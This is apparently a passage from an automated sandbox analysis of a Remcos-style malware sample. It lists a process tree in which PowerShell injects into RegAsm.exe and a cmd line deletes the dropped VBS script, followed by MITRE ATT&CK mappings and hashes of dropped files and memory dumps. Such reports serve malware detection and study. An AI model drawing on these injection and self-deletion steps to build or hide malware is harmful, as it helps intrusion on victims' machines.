      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1952
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4108
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6.vbs"
      4⤵
      PID:4640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
c4c91e72781fa500463c31fa08cf37b3

SHA1
c622b6bf078fc9d8257746ed4b74b8568fea8640

SHA256
169fb65d5cd6826e6d35f09b4450a61c2b7352903e9cabd7e972418dab4263fb

SHA512
756dfe977c30a0ba41016c521545bc9b98d2a13d52e9fb0756b9e4e9c9e34ae6ec5c5b3f904dc147d11ca97602e2f85783433a2610db365ce2cb9e931179f72b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
f519b342f1ff93fffd567dc37e89da99

SHA1
1f25c2fae7981190f0d3dc72389d262a8ce03292

SHA256
dd35e5acf0f6db2d3ecf58fa683972bc9d46f6a62d9d873cf9b2a2ae3b6183ce

SHA512
6c9af3883361844ec192fed2e9ce44c91c65cbb01b4653959e293bb9dc1823d5378e3e81f813ffb33ab3d1d0bc8df3a5362124101e445876fa15afa325d93534

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\zemmu.ps1

Filesize
1.7MB

MD5
a690ac95dca8570a314b623bac55d658

SHA1
b569b9125f7018e938b124a327e387e756a0d82b

SHA256
bb18e81e4fd293d6761dc4b9152ed6b96b32d512aa805edafc4bcf3d9e1c68b2

SHA512
8b6cc3f469b7cd694683114d1de41b7c73ede4bf920c35f1762b3bbaca6c330fa3d1edc166dd15faab9070c6f586f101f2b04e12830f1d45c0648bcfbd0abaaf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f81dbbaaadce7315e098e0828c968a2a

SHA1
434e32ff8fad5f775c1de489148e7509653e6210

SHA256
4f42d74738b05b558ddbb68439a9583353f14ffbe9af89de9cfd348f0a1a45e6

SHA512
b4a1a9cc6fddf60136823499acbd4d04cce1937c07929765f33f938edab10a719fb522714cfad9ef0f6f2fec7cf2d7a9b349b8aed2500d73bfa66de77ef89ee6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
217d9191dfd67252cef23229676c9eda

SHA1
80d940b01c28e3933b9d68b3e567adc2bac1289f

SHA256
e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133

SHA512
86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_upq2bvdq.xpr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1952-78-0x000001FB35A50000-0x000001FB35A5A000-memory.dmp

Filesize
40KB

Download
memory/3188-12-0x00007FFD766D0000-0x00007FFD77191000-memory.dmp

Filesize
10.8MB

Download
memory/3188-11-0x00007FFD766D0000-0x00007FFD77191000-memory.dmp

Filesize
10.8MB

Download
memory/3188-0-0x00007FFD766D3000-0x00007FFD766D5000-memory.dmp

Filesize
8KB

Download
memory/3188-64-0x00007FFD766D0000-0x00007FFD77191000-memory.dmp

Filesize
10.8MB

Download
memory/3188-10-0x0000022D59F00000-0x0000022D59F22000-memory.dmp

Filesize
136KB

Download
memory/3380-22-0x000001DC51FB0000-0x000001DC51FBA000-memory.dmp

Filesize
40KB

Download
memory/4108-83-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-97-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-84-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-87-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-88-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-89-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-90-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-91-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-96-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-81-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-79-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-104-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-112-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-113-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-120-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-121-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-128-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4108-129-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download